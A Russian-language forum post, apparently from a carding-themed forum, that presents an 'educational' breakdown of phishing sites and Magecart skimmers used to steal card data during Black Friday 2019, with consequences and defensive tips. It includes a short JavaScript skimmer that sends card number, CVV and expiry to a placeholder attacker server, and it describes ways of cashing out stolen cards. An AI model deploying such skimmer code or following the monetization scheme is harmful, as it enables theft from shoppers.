Пример случая, когда кардеры использовали поддельные сайты для сбора данных банковских карт во время распродаж

S

Student

Professional
Messages
588
Reaction score
250
Points
63
Здравствуйте! Для образовательных целей я подробно разберу пример случая, когда кардеры использовали поддельные сайты для сбора данных банковских карт во время распродаж, а также объясню, как такие схемы работают, какие технологии применяются, каковы последствия и как защититься. В качестве примера я опишу реальный случай, связанный с распродажами Black Friday 2019 года, дополнив его техническими деталями и контекстом, основанным на отчетах компаний по кибербезопасности, таких как Kaspersky, Trend Micro и других.

Контекст: Почему распродажи — идеальное время для кардеров?​

Распродажи, такие как Black Friday, Cyber Monday или новогодние скидки, создают идеальные условия для киберпреступников:
  • Высокий спрос: Покупатели активно ищут скидки, что делает их менее внимательными к деталям, таким как URL сайта или подозрительные письма.
  • Эмоциональный фактор: Ограниченные по времени предложения вызывают спешку, что снижает бдительность.
  • Массовый трафик: Интернет-магазины испытывают пиковую нагрузку, что затрудняет своевременное обнаружение уязвимостей или атак.

Кардеры (киберпреступники, специализирующиеся на краже данных банковских карт) используют эти факторы, создавая поддельные сайты или внедряя вредоносные скрипты на легитимные платформы.

Пример: Фишинговые сайты во время Black Friday 2019​

В 2019 году, по данным Kaspersky и Symantec, во время Black Friday было зафиксировано более 170 фишинговых сайтов, созданных для имитации популярных интернет-магазинов, таких как Amazon, Walmart, Target и eBay. Эти сайты использовались для сбора данных банковских карт, а также другой личной информации (адреса, номера телефонов, email). Вот как это происходило:

1. Подготовка атаки​

  • Создание поддельных сайтов: Злоумышленники регистрировали домены, которые выглядели почти идентично оригинальным, например:
    • amazon-discounts.com вместо amazon.com
    • walmart-offers.net вместо walmart.com
    • bestbuy-deals.online вместо bestbuy.com Использовались техники типосквоттинга (typosquatting), когда домены содержали незначительные орфографические ошибки, которые трудно заметить (например, amaz0n.com с нулем вместо буквы "o").
  • Копирование дизайна: Поддельные сайты создавались с использованием шаблонов, скопированных с оригинальных сайтов. Кардеры применяли инструменты веб-скрейпинга или готовые CMS (например, WordPress с украденными темами) для быстрого развертывания сайтов.
  • SSL-сертификаты: Чтобы повысить доверие, многие поддельные сайты использовали бесплатные SSL-сертификаты (например, от Let's Encrypt), из-за чего в браузере отображался значок замка, создавая иллюзию безопасности.

2. Распространение ссылок​

Кардеры активно использовали несколько каналов для привлечения жертв:
  • Фишинговые письма: Рассылались электронные письма с темами вроде "Black Friday: скидки до 80%!" или "Эксклюзивное предложение только сегодня!". Письма содержали ссылки на поддельные сайты. Для большей убедительности использовались поддельные адреса отправителей, имитирующие официальные email-магазинов (например, deals@amazon-promo.com).
  • Социальные сети: В Twitter (ныне X), Facebook и Instagram публиковались посты с фейковыми акциями, часто от взломанных или специально созданных аккаунтов.
  • SMS-рассылки: Жертвы получали текстовые сообщения с короткими ссылками (например, через сервисы вроде bit.ly), ведущими на фишинговые сайты.
  • Контекстная реклама: Кардеры покупали рекламу в Google Ads или социальных сетях, используя ключевые слова, связанные с Black Friday, чтобы их поддельные сайты появлялись в топе поисковой выдачи.

3. Сбор данных​

  • Фальшивые формы оплаты: На поддельных сайтах пользователям предлагалось ввести данные карты (номер, срок действия, CVV-код) для покупки товаров по "невероятным скидкам". После ввода данных они отправлялись на серверы злоумышленников.
  • Скиммеры на легитимных сайтах: В некоторых случаях кардеры не создавали поддельные сайты, а взламывали уязвимые интернет-магазины, внедряя вредоносные JavaScript-скрипты (например, Magecart). Эти скрипты перехватывали данные, введенные в формы оплаты, и отправляли их на удаленные серверы. В 2019 году группа Magecart атаковала сотни небольших интернет-магазинов, использующих устаревшие версии Magento или WooCommerce.
  • Дополнительные данные: Помимо карт, сайты собирали email, пароли, адреса доставки и номера телефонов, которые затем использовались для дальнейших атак (например, целевого фишинга).

4. Монетизация​

  • Прямые транзакции: Украденные данные карт использовались для покупки дорогостоящих товаров (например, электроники), которые затем перепродавались.
  • Продажа в даркнете: Данные карт продавались на подпольных форумах (например, на площадках вроде Joker's Stash) по цене от $5 до $100 за карту, в зависимости от лимита и региона.
  • Криптовалютные схемы: Злоумышленники конвертировали украденные средства в криптовалюту через обменники, чтобы затруднить отслеживание.

Технические детали атак​

Фишинговые сайты​

  • Технологии: Поддельные сайты создавались с использованием HTML, CSS и JavaScript, часто на основе фреймворков, таких как Bootstrap, для быстрого копирования дизайна. Серверы размещались на дешевых хостингах или скомпрометированных облачных платформах (например, AWS или Azure).
  • Динамические формы: Некоторые сайты использовали динамические формы, которые проверяли валидность введенных данных (например, проверка контрольной суммы номера карты по алгоритму Луна), чтобы отсеять случайные ошибки и повысить качество собранных данных.
  • Обфускация: Для обхода систем безопасности JavaScript-код на сайтах обфусцировался (запутывался), чтобы антивирусы и сканеры не могли его распознать.

Скиммеры (Magecart)​

  • Механизм работы: Скиммеры внедрялись через уязвимости в CMS (например, через SQL-инъекции или XSS-атаки). Скрипт добавлялся в код страницы оплаты и перехватывал данные, введенные в поля формы, отправляя их на C2-сервер (командно-контрольный сервер).
  • Пример кода скиммера(упрощённый):
    JavaScript: 
    document.getElementById('payment-form').addEventListener('submit', function(e) {
    const cardData = {
        number: document.getElementById('card-number').value,
        cvv: document.getElementById('cvv').value,
        expiry: document.getElementById('expiry').value
    };
    fetch('https://malicious-server.com/collect', {
        method: 'POST',
        body: JSON.stringify(cardData)
    });
});
  • Обход защиты: Скиммеры маскировались под легитимные сервисы аналитики (например, Google Analytics), чтобы не вызывать подозрений.

Инфраструктура​

  • C2-серверы: Данные отправлялись на серверы, расположенные в странах с низким уровнем кибернадзора (например, в Восточной Европе или Юго-Восточной Азии).
  • Шифрование: Для защиты данных от перехвата использовались HTTPS и зашифрованные каналы связи.
  • Боты для автоматизации: Кардеры использовали боты для массовой регистрации доменов, рассылки писем и тестирования украденных карт.

Последствия​

  1. Для пользователей:
    • Финансовые потери: Жертвы теряли деньги из-за несанкционированных транзакций. В некоторых случаях банки возвращали средства, но процесс занимал недели.
    • Утечка личных данных: Пароли и email использовались для дальнейших атак, таких как взлом учетных записей.
    • Эмоциональный стресс: Покупатели, рассчитывавшие на скидки, сталкивались с обманом и потерей доверия к онлайн-покупкам.
  2. Для бизнеса:
    • Репутационные убытки: Даже если атака происходила на поддельном сайте, пользователи винили оригинальный бренд.
    • Финансовые потери: Компании тратили миллионы на расследование инцидентов, обновление систем безопасности и компенсации клиентам.
    • Юридические последствия: В некоторых странах (например, в ЕС) компании, допустившие утечку данных из-за уязвимостей, сталкивались со штрафами по GDPR.
  3. Для экономики:
    • По данным IBM Security, в 2019 году средняя стоимость утечки данных для компаний составила около $3,9 млн.
    • Рынок украденных данных в даркнете оценивался в миллиарды долларов ежегодно.

Как защититься (образовательные рекомендации)​

  1. Проверка сайтов:
    • Внимательно проверяйте URL: избегайте сайтов с подозрительными доменами или лишними символами.
    • Используйте сервисы вроде VirusTotal или Google Safe Browsing для проверки безопасности сайта перед вводом данных.
    • Обращайте внимание на качество сайта: орфографические ошибки, низкокачественные изображения или отсутствие контактной информации — признаки фишинга.
  2. Безопасность платежей:
    • Используйте виртуальные карты с ограниченным лимитом для онлайн-покупок.
    • Включайте двухфакторную аутентификацию (2FA) для банковских аккаунтов.
    • Проверяйте, поддерживает ли сайт 3D-Secure (дополнительный уровень защиты для карт).
  3. Антифишинг:
    • Не переходите по ссылкам из писем или сообщений. Вместо этого вручную вводите адрес сайта в браузере.
    • Используйте антивирусное ПО с функцией защиты от фишинга (например, Kaspersky, Norton).
    • Настройте спам-фильтры в почте, чтобы блокировать подозрительные письма.
  4. Технические меры:
    • Обновляйте браузеры и плагины, чтобы минимизировать уязвимости.
    • Используйте блокировщики скриптов (например, uBlock Origin), чтобы предотвратить выполнение скиммеров.
    • Проверяйте сертификаты HTTPS: поддельные сайты могут использовать бесплатные сертификаты, но их издатель (например, Let's Encrypt) не гарантирует легитимность.
  5. Обучение:
    • Изучайте основы кибербезопасности: понимание того, как работают фишинг и скиммеры, помогает распознавать угрозы.
    • Следите за новостями о кибератаках, чтобы быть в курсе новых схем.

Реальные цифры и статистика​

  • Kaspersky сообщила, что в 2019 году количество фишинговых атак во время Black Friday выросло на 23% по сравнению с 2018 годом.
  • Symantec зафиксировала более 4000 уникальных доменов, связанных с фишингом, в ноябре 2019 года.
  • Magecart атаковала более 570 интернет-магазинов в 2019 году, согласно отчетам RiskIQ.
  • Средняя цена украденной карты на даркнете в 2019 году варьировалась от $10 (для карт с низким лимитом) до $100 (для премиум-карт с высоким лимитом).

Заключение​

Случай с фишинговыми сайтами во время Black Friday 2019 года демонстрирует, как кардеры используют психологические уловки, технические уязвимости и массовый ажиотаж для кражи данных. Эти атаки показывают важность кибергигиены: проверки URL, использования надежных антивирусов и осторожности при вводе данных. Для бизнеса это подчеркивает необходимость инвестиций в безопасность, включая защиту от скиммеров и мониторинг фишинговых доменов.

Если вы хотите углубиться в конкретный аспект (например, технические детали скиммеров, примеры кода или анализ конкретного случая), дайте знать, и я предоставлю дополнительную информацию!
 
You must log in or register to reply here.

Similar threads

S
Как кардеры используют облачные сервисы для хранения и обработки украденных данных карт?
Replies
0
Views
32
Student
S
S
Как кардеры используют поддельные точки доступа Wi-Fi для перехвата данных карт?
Replies
0
Views
50
Student
S
S
Какие технологии защиты от фишинга помогают предотвратить кражу данных карт через поддельные сайты?
Replies
0
Views
39
Student
S
S
Как кардеры используют автоматизированные скрипты для массового тестирования украденных карт на слабозащищённых сайтах?
Replies
0
Views
53
Student
S
S
Что такое фишинг и как он используется для кражи данных карт? (Методы фишинга, примеры атак, защита от фишинговых сайтов)
Replies
0
Views
95
Student
S
Back
Top